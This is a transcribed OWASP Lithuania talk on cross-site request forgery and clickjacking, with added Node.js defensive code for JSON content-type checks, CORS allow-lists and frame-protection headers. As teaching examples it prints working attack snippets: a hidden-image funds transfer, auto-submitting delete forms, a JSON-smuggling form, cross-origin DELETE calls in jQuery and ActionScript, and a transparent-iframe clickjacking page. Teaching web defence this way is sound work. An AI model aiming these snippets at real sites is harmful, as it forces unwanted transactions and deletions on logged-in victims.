Cross-site request forgery: Ways to exploit, ways to prevent Paulius Leščinskas, OWASP EEE Lithuania 2015-10-07


Page 1: [Lithuania] Cross-site request forgery: ways to exploit, ways to prevent

Cross-site request forgery: Ways to exploit, ways to prevent

Paulius Leščinskas, OWASP EEE Lithuania, 2015-10-07

Page 2:

About Me

Paulius Leščinskas, Pod owner @ Adform

http://lescinskas.lt

[email protected]

@lescinskas

https://www.linkedin.com/in/pluton

Page 3:

Cross-site request forgery (CSRF)

A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request, including the victim’s session cookie and any other automatically included authentication information, to a vulnerable web application. This allows the attacker to force the victim’s browser to generate requests the vulnerable application thinks are legitimate requests from the victim.

Thank you http://www.seclab.cs.sunysb.edu/seclab/jcsrf/ for the image.

Page 4:

Cross-site request forgery (CSRF)

Typical impact:

• Initiate transactions (modify data)

• Access sensitive data

Prerequisite: the victim MUST be logged in to the target system.

Typical example:

<img src="http://example.com/app/transferFunds?amount=1500&destinationAccount=attackersAcct#" width="0" height="0" />

Page 5:

Cross-site request forgery (CSRF)

What about POST?

Page 6:

Cross-site request forgery (CSRF)

Example 2 (POST request):

<form method="post" action="https://www.example.com/deleteUser">
  <input type="hidden" name="id" value="1" />
</form>
<script>
  document.forms[0].submit();
</script>

Page 7:

Cross-site request forgery (CSRF)

No forms? Just RESTful JSON APIs?

Page 8:

Cross-site request forgery (CSRF)

The same data is encoded differently in the raw HTTP body depending on how it is sent. For example, the fields

Name: John Doe
Text: 1 + 2 = 3

• Via an HTML form (application/x-www-form-urlencoded):

Name=John+Doe&Text=1+%2B+2+%3D+3

• Via a RESTful Web API formatted as JSON:

{"Name": "John Doe", "Text": "1 + 2 = 3"}

Page 9:

Cross-site request forgery (CSRF)

Example 3 (POST JSON request, bypassing the x-www-form-urlencoded structure):

<form method="post" action="https://www.example.com/deleteUser">
  <input type="hidden" name='{"id": 1, "ignore-me": "' value='test"}' />
</form>
<script>
  document.forms[0].submit();
</script>

Data sent (the form's field name, an "=", and the field value concatenate into one JSON document):

{"id": 1, "ignore-me": "=test"}

http://itsecurityconcepts.com/2014/04/22/csrf-on-json-requests/
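Pages 8 and 9 show why a JSON endpoint cannot rely on the body "looking like JSON": a form can assemble a valid JSON document from a field name and value. The defender-side counterpart, as an added example that is not code from the talk, is to accept only bodies declared as application/json and to reject anything arriving in one of the three encodings an HTML form is able to produce. Plain Node.js; `validateJsonRequest`, `mediaType` and the request shape `{ method, headers, body }` are names chosen for this example, and the sample requests are constructed. One caveat: a JavaScript client can set `Content-Type: application/json` cross-origin only after a CORS preflight, so this check protects the endpoint only as long as the CORS policy (Page 10) does not hand that preflight to arbitrary origins.

```javascript
// Added example (not code from the talk): strict input checks for a JSON
// endpoint, run with plain Node.js. `validateJsonRequest` is a hypothetical
// helper name; requests are plain objects { method, headers, body }.

// The only body encodings an HTML <form> can produce. A request arriving in
// one of these at a JSON endpoint was not sent by our own JavaScript client.
const FORM_ENCODINGS = new Set([
  'application/x-www-form-urlencoded',
  'multipart/form-data',
  'text/plain',
]);

// Reduce a Content-Type header to its media type, ignoring parameters
// such as "; charset=utf-8".
function mediaType(contentType) {
  return (contentType || '').split(';')[0].trim().toLowerCase();
}

// Accept only bodies declared as application/json that parse to a JSON
// object. Returns { ok: true, json } or { ok: false, reason }.
function validateJsonRequest(req) {
  const type = mediaType(req.headers['content-type']);
  if (FORM_ENCODINGS.has(type)) {
    return { ok: false, reason: `form encoding ${type} not accepted by JSON API` };
  }
  if (type !== 'application/json') {
    return { ok: false, reason: `unexpected content-type "${type || '(none)'}"` };
  }
  let json;
  try {
    json = JSON.parse(req.body);
  } catch (err) {
    return { ok: false, reason: 'body is not valid JSON' };
  }
  if (json === null || typeof json !== 'object' || Array.isArray(json)) {
    return { ok: false, reason: 'body must be a JSON object' };
  }
  return { ok: true, json };
}

// Constructed sample requests: the body assembled by the form on Page 9,
// which a browser can only deliver under a form encoding, versus a genuine
// call made by the application's own client.
const FORGED_FORM_POST = {
  method: 'POST',
  headers: { 'content-type': 'text/plain' },
  body: '{"id": 1, "ignore-me": "=test"}',
};
const GENUINE_API_CALL = {
  method: 'POST',
  headers: { 'content-type': 'application/json; charset=utf-8' },
  body: '{"id": 1}',
};

console.log('forged form post:', validateJsonRequest(FORGED_FORM_POST));
console.log('genuine API call:', validateJsonRequest(GENUINE_API_CALL));
```

The check deliberately compares the media type only, so `application/json; charset=utf-8` still passes while `text/plain`, `multipart/form-data` and an absent header are all refused before the body is parsed.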

Page 10:

Cross-site request forgery (CSRF)

All HTTP methods (GET/POST/PUT/PATCH/DELETE ...) with any data encoding can be issued from JavaScript (XMLHttpRequest, aka XHR, aka Ajax) if your Cross-origin resource sharing (CORS) headers allow XHR calls from any location:

OPTIONS /foo/bar
Host: example.com
Origin: http://foo.com

Vulnerable if: Access-Control-Allow-Origin: *

jQuery example:

$.ajax({
  url: 'http://example.com/foo/bar',
  type: 'DELETE',
  data: {"id": 1},
  success: function(result) {
    // Do something with the result
  }
});
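As an added example that is not code from the talk, the following plain Node.js block shows the CORS policy a cookie-authenticated API should emit instead of `Access-Control-Allow-Origin: *`: an explicit allow-list whose entries are echoed exactly, with no CORS headers at all for anyone else, plus an audit helper that classifies the headers an existing deployment returns. `corsHeaders`, `assessCors`, the allow-list and the probe origin are all constructed for this example. Two caveats a practitioner should keep in mind: browsers never attach cookies to a request whose response says `Access-Control-Allow-Origin: *`, so the configuration that actually exposes a session-authenticated API to cross-origin XHR is one that reflects an arbitrary `Origin` together with `Access-Control-Allow-Credentials: true`; and CORS only governs what JavaScript may read and whether a preflighted request is sent at all, so a plain form POST or image GET like the ones on Pages 4 and 6 carries the session cookie regardless of any CORS header.

```javascript
// Added example (not code from the talk): CORS decisions for an API that
// serves cookie-authenticated requests. Plain Node.js; `corsHeaders` and
// `assessCors` are hypothetical helper names, the allow-list is constructed.
const ALLOWED_ORIGINS = new Set([
  'https://app.example.com',
  'https://admin.example.com',
]);

// Response headers for a request carrying `origin`: an exact allow-list
// match is echoed back; anything else gets no CORS headers at all, so the
// browser blocks the cross-origin read and fails the preflight.
function corsHeaders(origin) {
  if (!origin || !ALLOWED_ORIGINS.has(origin)) return {};
  return {
    'Access-Control-Allow-Origin': origin,         // exact value, never "*"
    'Access-Control-Allow-Credentials': 'true',
    'Access-Control-Allow-Methods': 'GET, POST, PUT, PATCH, DELETE',
    'Access-Control-Allow-Headers': 'Content-Type',
    'Vary': 'Origin',                              // shared caches must key on Origin
  };
}

// Audit helper for an existing deployment: `probeOrigin` is an origin that
// should NOT be trusted; `responseHeaders` is what the server answered.
function assessCors(probeOrigin, responseHeaders) {
  const h = {};
  for (const [k, v] of Object.entries(responseHeaders)) h[k.toLowerCase()] = String(v);
  const acao = h['access-control-allow-origin'];
  const creds = (h['access-control-allow-credentials'] || '').toLowerCase() === 'true';
  if (!acao) return 'no-cors';
  // "*" lets any page read the response, but browsers refuse to send
  // cookies with it, so the request arrives unauthenticated.
  if (acao === '*') return 'wildcard';
  // Echoing an untrusted Origin together with credentials is the setting
  // that lets a foreign page drive the API with the victim's cookies.
  if (acao === probeOrigin) return creds ? 'reflected-with-credentials' : 'reflected';
  return 'restricted';
}

// Constructed sample responses: the wildcard setting from the slide, an
// Origin-reflecting one, and the allow-list policy above, all probed
// from an origin that must not be trusted.
const PROBE = 'https://untrusted.example.org';
const WEAK_WILDCARD = { 'Access-Control-Allow-Origin': '*' };
const WEAK_REFLECTING = {
  'Access-Control-Allow-Origin': PROBE,
  'Access-Control-Allow-Credentials': 'true',
};

console.log('wildcard   :', assessCors(PROBE, WEAK_WILDCARD));
console.log('reflecting :', assessCors(PROBE, WEAK_REFLECTING));
console.log('allow-list :', assessCors(PROBE, corsHeaders(PROBE)));
```

The `Vary: Origin` header matters as soon as the allow-list has more than one entry: without it a shared cache may serve the response prepared for one allowed origin to a request from another.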

Page 11:

Cross-site request forgery (CSRF)

Flash to the attack!

Page 12:

Cross-site request forgery (CSRF)

Example 4 (any HTTP-based request using ActionScript):

import flash.net.URLRequest;
import flash.net.URLVariables;
import flash.net.URLRequestMethod;
import flash.net.URLRequestHeader;
import flash.net.URLLoader;

var loader:URLLoader = new URLLoader();
var req:URLRequest = new URLRequest("http://www.example.com/deleteUser");
var header:URLRequestHeader = new URLRequestHeader("Origin", "http://www.test.com"); // setting the Origin header this way worked only until about Flash 9
req.requestHeaders.push(header);
req.method = URLRequestMethod.DELETE;
req.contentType = 'application/json';
req.data = '{"id": 1}';
loader.load(req);

Page 13:

Cross-site request forgery (CSRF)

... valid if example.com has a crossdomain.xml like:

<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="*" secure="false" />
</cross-domain-policy>

9/10 Lithuanian TOP10 websites have such a crossdomain.xml

…mostly to load assets from Flash-based banner ads.

... also, you can access ActionScript objects, functions and properties of a SWF file hosted on another domain if that file calls Security.allowDomain("*"); (cross-scripting)

Page 14:

Cross-site request forgery (CSRF)

Countermeasures

● Synchronizer token pattern!
● Check Origin header
● Appropriate CORS headers
● Appropriate crossdomain.xml rules
● Short-living sessions (only reduces likelihood)

Very hard (impossible?) to prevent CSRF if the website has XSS vulnerabilities.

https://en.wikipedia.org/wiki/Cross-origin_resource_sharing

http://www.adobe.com/devnet/adobe-media-server/articles/cross-domain-xml-for-streaming.html

https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet

Page 15:

ClickJacking

Page 16:

ClickJacking

Page 17:

ClickJacking

<html>
<body>
  <iframe src="http://victim.site" style="position: absolute; filter:alpha(opacity=0); opacity:0"></iframe>
  <div style="position: relative; left: 10px; top: 10px; z-index: -1"><a href="#">CLICK ME</a></div>
</body>
</html>

OVERRIDES ALL CSRF PROTECTIONS!

https://www.owasp.org/index.php/Clickjacking

http://www.troyhunt.com/2013/05/clickjack-attack-hidden-threat-right-in.html

https://community.qualys.com/blogs/securitylabs/2012/11/29/clickjacking-an-overlooked-web-security-hole

Page 18:

ClickJacking

Countermeasures

Framebusting: X-Frame-Options (XFO) response HTTP header or meta http-equiv tag

X-Frame-Options: DENY (disallows the page to be loaded in an IFRAME)

X-Frame-Options: SAMEORIGIN (allows the page to be loaded in an IFRAME from the same origin)

X-Frame-Options: ALLOW-FROM https://trusted.domain (allows the page to be loaded from specific origins; unsupported by Chrome and Safari!)

Worldwide usage:

Facebook: DENY, Twitter: SAMEORIGIN, GitHub: DENY, 60% of Alexa Top 10 use framebusting...

https://www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet (+more defense techniques)

https://www.owasp.org/index.php/Testing_for_Clickjacking_(OTG-CLIENT-009)

https://developer.mozilla.org/en-US/docs/Web/HTTP/X-Frame-Options
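As an added example that is not code from the talk, the following plain Node.js block turns the X-Frame-Options values above into a small policy helper and an audit function of the kind a survey like the "worldwide usage" figures would use. `frameProtectionHeaders`, `assessFraming` and the sample responses are constructed for this example. It goes one step beyond the slide: alongside X-Frame-Options it emits the Content-Security-Policy `frame-ancestors` directive, the standardised successor that takes a full list of origins and is honoured by the browsers where ALLOW-FROM is unsupported; where both headers are present, browsers that understand `frame-ancestors` give it precedence, so the audit reads it first. One caveat on the "meta http-equiv" option: browsers only honour X-Frame-Options as a real response header and ignore it inside a `<meta>` tag, so the audit below looks at headers only.

```javascript
// Added example (not code from the talk): choosing and auditing clickjacking
// protection headers in plain Node.js. `frameProtectionHeaders` and
// `assessFraming` are hypothetical helper names.

// policy: 'deny', 'sameorigin', or an array of origins allowed to frame us.
function frameProtectionHeaders(policy) {
  if (policy === 'deny') {
    return { 'X-Frame-Options': 'DENY', 'Content-Security-Policy': "frame-ancestors 'none'" };
  }
  if (policy === 'sameorigin') {
    return { 'X-Frame-Options': 'SAMEORIGIN', 'Content-Security-Policy': "frame-ancestors 'self'" };
  }
  if (Array.isArray(policy) && policy.length > 0) {
    // X-Frame-Options takes a single origin and ALLOW-FROM is ignored by
    // Chrome and Safari; frame-ancestors carries the full list for them.
    return {
      'X-Frame-Options': `ALLOW-FROM ${policy[0]}`,
      'Content-Security-Policy': `frame-ancestors ${policy.join(' ')}`,
    };
  }
  throw new Error(`unknown framing policy: ${policy}`);
}

// Classify a response's framing protection from its headers. frame-ancestors
// takes precedence over X-Frame-Options in browsers that support it.
function assessFraming(responseHeaders) {
  const h = {};
  for (const [k, v] of Object.entries(responseHeaders)) h[k.toLowerCase()] = String(v);
  const fa = /(?:^|;)\s*frame-ancestors\s+([^;]+)/i.exec(h['content-security-policy'] || '');
  if (fa) {
    const sources = fa[1].trim().toLowerCase();
    if (sources === "'none'") return 'denied';
    if (sources === "'self'") return 'sameorigin';
    return 'restricted';
  }
  const xfo = (h['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return 'denied';
  if (xfo === 'SAMEORIGIN') return 'sameorigin';
  if (xfo.startsWith('ALLOW-FROM')) return 'restricted-legacy';  // not honoured by Chrome/Safari
  return 'unprotected';
}

// Constructed sample responses, modelled on the usage figures above.
const SAMPLES = {
  'facebook-like': { 'X-Frame-Options': 'DENY' },
  'twitter-like': { 'x-frame-options': 'SAMEORIGIN' },
  'unprotected': { 'Content-Type': 'text/html' },
};
for (const [name, headers] of Object.entries(SAMPLES)) {
  console.log(name, '->', assessFraming(headers));
}
```

A page that should never be framed gets `frameProtectionHeaders('deny')`; a page meant to be embedded by one partner gets the array form, which the audit reports as `restricted` rather than the weaker `restricted-legacy` it gives a bare ALLOW-FROM.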

Page 19:

Thank you!